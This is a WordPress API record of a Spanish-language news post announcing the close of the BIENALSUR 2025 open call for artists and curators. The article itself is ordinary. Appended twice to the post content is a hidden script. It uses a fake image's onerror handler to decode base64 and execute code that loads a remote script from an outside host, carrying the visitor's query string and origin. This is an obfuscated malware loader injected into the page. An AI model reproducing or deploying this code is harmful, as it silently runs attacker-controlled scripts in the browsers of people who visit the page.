{"id":3930,"date":"2024-04-15T14:21:10","date_gmt":"2024-04-15T17:21:10","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3930"},"modified":"2025-08-13T23:57:04","modified_gmt":"2025-08-14T02:57:04","slug":"finaliza-la-convocatoria-abierta-internacional-rumbo-a-bienalsur-2025","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3930","title":{"rendered":"Finaliza la convocatoria Abierta Internacional rumbo a BIENALSUR 2025"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-52670f160c564e8122840e75787fe13d\" style=\"background-color:#740642\"><em>La Secretar\u00eda de Cultura invit\u00f3 a formar parte de la convocatoria internacional BIENALSUR 2025. La misma finaliza este lunes 15 de abril. La propuesta est\u00e1 destinada a artistas y curadores de todo el mundo que formar\u00e1n parte de este evento cultural.<\/em><\/h4>\n\n\n\n<p>La Direcci\u00f3n General y Art\u00edstica de BIENALSUR, organizada por la Universidad Nacional de Tres de Febrero (UNTREF), convoca a artistas, curadoras y curadores de cualquier nacionalidad a presentar proyectos art\u00edsticos y\/o curatoriales. Los proyectos seleccionados integrar\u00e1n la quinta edici\u00f3n a desarrollarse en 2025 en diversas sedes, museos, centros culturales, universidades y espacios no tradicionales, tanto en grandes ciudades como en peque\u00f1as localidades de diferentes pa\u00edses.<\/p>\n\n\n\n<p>La Convocatoria Internacional rumbo a BIENALSUR 2025 estuvo abierta desde el&nbsp;4 de marzo y concluye hoy lunes 15 de abril de 2024, con cierre a las 18 h. La aplicaci\u00f3n se realizar\u00e1 online, a trav\u00e9s de una plataforma disponible en espa\u00f1ol e ingl\u00e9s. Se aceptar\u00e1n propuestas que se inscriban dentro del \u00e1mbito de las teor\u00edas contempor\u00e1neas del arte y la cultura, contribuyendo a reflexionar, problematizar u ofrecer distintas perspectivas y enfoques sobre la multiplicidad de experiencias vitales de nuestro tiempo.<\/p>\n\n\n\n<p>BIENALSUR reivindica el derecho a la cultura y tiene como objetivo contribuir a la formaci\u00f3n de una ciudadan\u00eda cultural. Su formato particular y su funcionamiento colaborativo y en red fomentan la presencia del arte de cada regi\u00f3n desde sus particularidades y posiciones relativas. Promueve el desarrollo de un pensamiento cr\u00edtico aut\u00f3nomo con respecto a los relatos can\u00f3nicos y a pr\u00e1cticas alternativas dentro del \u00e1mbito del arte y la cultura, en sus modalidades de producci\u00f3n, exhibici\u00f3n, circulaci\u00f3n y consumo.<\/p>\n\n\n\n<p><strong>\u00bfC\u00f3mo funciona la Convocatoria Abierta?<\/strong><\/p>\n\n\n\n<p>La presentaci\u00f3n de proyectos art\u00edsticos y\/o curatoriales rumbo a BIENALSUR 2025 se realizar\u00e1 a trav\u00e9s de una plataforma online. La aplicaci\u00f3n es gratuita y admite 4 categor\u00edas: artista individual, artista grupal, curador\/a individual y curador\/a grupal. Por cada una de estas categor\u00edas corresponde una \u00fanica presentaci\u00f3n.<\/p>\n\n\n\n<p>El Consejo Internacional de Curadur\u00eda de BIENALSUR identificar\u00e1 y evaluar\u00e1 los Ejes Curatoriales para la edici\u00f3n 2025 a partir de los proyectos recibidos. Esto permitir\u00e1 consolidar una cartograf\u00eda estrechamente relacionada con las preocupaciones y experiencias de artistas y curadoras de todo el mundo. De esta selecci\u00f3n surgir\u00e1n los proyectos de la quinta edici\u00f3n de BIENALSUR 2025, a 10 a\u00f1os de su fundaci\u00f3n.<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n podes consultar en https:\/\/bienalsur.org\/es\/page\/faq, por dudas y\/o consultas podes comunicarte a trav\u00e9s de opencall@bienalsur.org<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/finaliza-la-convocatoria-abierta-internacional-rumbo-a-bienalsur-2025-95066\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Secretar\u00eda de Cultura invit\u00f3 a formar parte de la convocatoria internacional BIENALSUR 2025. La misma finaliza este lunes 15 de abril. La propuesta est\u00e1 destinada a artistas y curadores de todo el mundo que formar\u00e1n parte de este evento cultural. La Direcci\u00f3n General y Art\u00edstica de BIENALSUR, organizada por la Universidad Nacional de Tres [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3931,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26,16],"tags":[],"class_list":{"0":"post-3930","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales","9":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3930"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3930"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3930\/revisions"}],"predecessor-version":[{"id":6802,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3930\/revisions\/6802"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3931"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3930"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3930"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3930"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}